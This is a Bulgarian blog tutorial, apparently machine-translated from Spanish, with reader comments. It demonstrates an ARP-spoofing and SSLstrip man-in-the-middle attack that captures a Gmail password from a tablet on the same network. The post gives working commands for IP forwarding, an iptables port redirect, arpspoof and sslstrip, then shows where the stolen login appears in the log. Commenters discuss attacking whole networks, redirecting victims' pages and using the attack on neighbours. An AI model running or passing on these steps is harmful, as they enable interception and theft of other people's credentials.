ArpSpoofing и SSlstrip в действие.

Здравейте блогъри.

За днес имам малка извадка от това колко опасно може да бъде свързването във всяка мрежа без сигурност на тези, които толкова много от нас харесват.

За днес ще използвам ArpSpoofing с Sslstrip, за да получа парола за Gmail. За да направя средата по-контролирана, създадох акаунт, наречен „testarp@gmail.com".

И тъй като не обичам преамбюлите много, нека се захващаме за работа.

По всяко време не нося отговорност за това какво могат да направят със следната информация. Правя го изключително с образователна цел

ОКОЛЕН СВЯТ

За този тест имаме следното:

1. Нападател: Това е моят настолен или настолен компютър, който има Debian Wheezy. От хранилищата можете да инсталирате sslstrip y dsniff за да имаш подправяне на арфове

2. Жертва: Жертвата е таблет с Android, който иска да види пощата си само през браузъра.

3. Средата: Средата е моя Рутер на Cisco DPC2425

АДРЕСИ.

Адрес на атакуващия: 172.26.0.2

Адрес на рутера: 172.26.0.1

Адрес на жертвата: 172.26.0.8

АТАКАТА:

За да разберете малко повече как работи атаката, можете да отидете на стария ми ПУСНИ

Първото нещо, което ще направим за тази атака, е да активираме препращането, за да може компютърът ни да препрати информацията на жертвата, без те да забележат. (В противен случай това би било атака за отказ на услуги)

За това ще използваме:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Всяка команда в директен прозорец на конзолата.

Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo

моментна снимка1

Тогава как да получим това, което искаме?

Нека първо въведем пощата си на таблета. Докато влизаме, виждаме, че на нашата конзола се появяват хиляди и хиляди неща.

Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano

nano desdelinux

с Control + W търсим нещо, наречено SECURE POST.

И ще видим нещо подобно.

моментна снимка2

Сред тази огромна линия, която не може да се види, е имейл и паролата на жертвата.

Така че тичаме надясно, докато най-накрая видим светлината в края на тунела.

моментна снимка3

По друг повод ще видим как можем да се предпазим малко от тези атаки.

поздрави


Оставете вашия коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *

*

*

  1. Отговорен за данните: Мигел Анхел Гатон
  2. Предназначение на данните: Контрол на СПАМ, управление на коментари.
  3. Легитимация: Вашето съгласие
  4. Съобщаване на данните: Данните няма да бъдат съобщени на трети страни, освен по законово задължение.
  5. Съхранение на данни: База данни, хоствана от Occentus Networks (ЕС)
  6. Права: По всяко време можете да ограничите, възстановите и изтриете информацията си.

  1.   @Jlcmux каза той

    Използвам възможността да кажа, че когато публикацията беше публикувана, командите не бяха правилни.

    В командата iptables в края липсва 8080, който е на друг ред. И тогава командите arpspoof бяха на един ред. Всяка команда е на различен ред.

    Дано редакторът го види и да го поправи.

    Поздрави.

    1.    Мануел де ла Фуенте каза той

      Направих корекциите, които споменавате, добре ли е?

      Ако ще вмъквате код в предпочитан запис, използвайте HTML изгледа и проверете дали статията е правилна, преди да я изпратите на чакащо. Благодаря ти.

  2.   Луис каза той

    Смразяващо е да се знае, че тези от нас, които нямат познания, са толкова уязвими. Много добра информация, дори когато разбирам малко от темата, осъзнавам важността. Благодаря ти!
    поздрави

  3.   Гискард каза той

    Но това работи само ако нападателят и жертвата са в една и съща мрежа. Във всеки случай ми се струва, че ако (в една и съща мрежа) се свържете с HTTPS, това не се случва, защото данните са криптирани ПРЕДИ да напуснете машината си. Ако се свързвате чрез HTTP (без S), мисля, че дори като погледнете мрежовия кабел, виждате ключовете.

    1.    @Jlcmux каза той

      Не е вярно. Хаквам gmail парола и ако забележите, че gmail използва https. Така? Въпросът е, че въпреки че https е сигурен, това зависи от http. Така че не е толкова безопасно.

      Не признавайте толкова много за https, че S не е за Супермен, а за "безопасно"

    2.    Rten каза той

      работи с или без https, опитах го с по-специализирано дистрибуция на linux и работи без проблеми

    3.    Мануел де ла Фуенте каза той

      Можете точно да го използвате, за да дадете урок на онези, които ви откраднат Wi-Fi. 😀

      Горе-долу прилича на това, което те казаха отдавна в блога на Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant каза той

        Остия, чудесно какво прави! / И тогава те казват на моя параноик всеки път, когато използвам VPN, когато отидат да проверят банковата сметка ...). Между другото, трябва да видите колко цинични са хората в коментарите ... ако в крайна сметка крадат ...

        1.    eliotime3000 каза той

          Сега трябва да вземем урок за това как да създадем и предложим своя собствена VPN услуга.

      2.    Daniel каза той

        Историята, която свързвате, е много интересна, дори изглежда достойна за нова книга и това ме кара да си спомням, когато използвах интернет на съседите си и въпреки че казвам, че познавам темата, мисля, че никога не бих могъл да видя истинските измерения на опасността, която бих могъл да има последно, за мое щастие, те само смениха паролата на WPA2 и там започна моята история с доставчика на хаха

    4.    Мавриций каза той

      Ето защо заглавието казва Sslstrip в действие.

      Действа, стига нападателят да е в средата

  4.   веднага каза той

    Каква вълна работиш на призма? -.-
    Не.
    Какво чакате, за да изпратите вашата заявка XD
    отношение на
    добър пост

  5.   auroszx каза той

    Интересно, по-късно ще направя образователен тест ... Може би дори бих могъл да премахна паролата за WiFi и да се позабавлявам за малко 😛
    Във всеки случай можете ли да направите нещо подобно, за да изпратите различни страници до тези, които целта е поискала? Например, те искат да отворят Facebook и аз да ги пренасоча към Google? 😛

    1.    @Jlcmux каза той

      Да. Но всичко е съвсем различно руло.

      Може би ще го публикувам по-късно.

  6.   последен новобранец каза той

    много добър пост, тези теми са много образователни, сега трябва да можем да противодействаме на тази атака, тъй като някои (като мен) се свързват с обществени мрежи (университета например), би било полезно да се избегне.

    Поздрави!

  7.   просто-друг-dl-потребител каза той

    Не ми се получи 🙁

  8.   Еха каза той

    Тук нещо ме проваля, освен факта, че https връзките са криптирани чрез сертификат на сървъра (след като сертификатът е на вашето устройство, вашият браузър отговаря за криптирането) с iptables пренасочвате порт 80 (http), а не 443 което е https

    1.    @Jlcmux каза той

      И аз така си мислех. Въпросът е, че въпреки че https е "защитен", за съжаление зависи от http. Така че sslstrip се възползва от това, кара браузъра да повярва, че използва https идентификационни данни, но не.

      1.    Еха каза той

        Боже! но браузърът трябва да види предупреждение от типа "този сертификат идва от подозрителен сайт или нещо подобно" ... определено ще трябва да направя тестове XD

        1.    @Jlcmux каза той

          Не, абсолютно нищо не излиза.

  9.   просто-друг-dl-потребител каза той

    Най-накрая се получи за мен
    Свързан съм в WEP мрежа с парола и тя така или иначе ми показа директно паролата.

    Запитване. Можете ли да направите същата процедура, но за всички компютри, които са свързани към мрежата, вместо да имате една жертва?

    1.    @Jlcmux каза той

      Да, можеш. Но не съм правил експерименти. Опитайте сами и ни кажете как върви.

  10.   Синик19 каза той

    Единственото нещо, което получавам с това е, че машината на жертвата излиза офлайн, но sslstrip не ми показва нищо: /

    1.    @Jlcmux каза той

      Трябва да деактивирате защитната стена за момент. Или поне активирайте входящите връзки.

  11.   Мистър Блек каза той

    Сондата и аз виждахме само потребителското име и паролата на страницата във facebook, в gmail не намерих никакви резултати в дневника, също така имах нужда само от ред arpspoof «arpspoof -i -t«. От друга страна, машината-жертва не може да отвори някои страници. Ще продължа да разследвам, много е интересно. Помощ за тези, които използват Manjaro, пакетите за инсталиране са: dsniff (тук е arpspoff), twisted и python2-pyopenssl. Sslstrip можете да изтеглите от тук: http://www.thoughtcrime.org/software/sslstrip/
    За да го стартирате $ python2 sslstrip.py
    Поздрави.

  12.   Мистър Блек каза той

    Не излезе, но линията arpspoof е: #arpspoof -i int -t ip-жертва ip-рутер

  13.   Гилбърт каза той

    вижте, правя точно това, което казвате:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arppoof -i eth0 -t 172.26.0.8 172.26.0.1
    arppoof -i eth0 -t 172.26.0.1 172.26.0.2

    проблемът е, че жертвата, която е друг компютър, който имам тук в стаята си, нямам връзка до точката, че трябва да рестартирам рутера, какво мога да направя да ми помогне.

    Друго нещо е, че работя с виртуална машина и когато изпълня командата iwconfig, wlan0 не се появява, нито когато изпълнявам ifconfig, обаче, ако имам интернет на виртуалната си машина, какво с интерфейс eth0.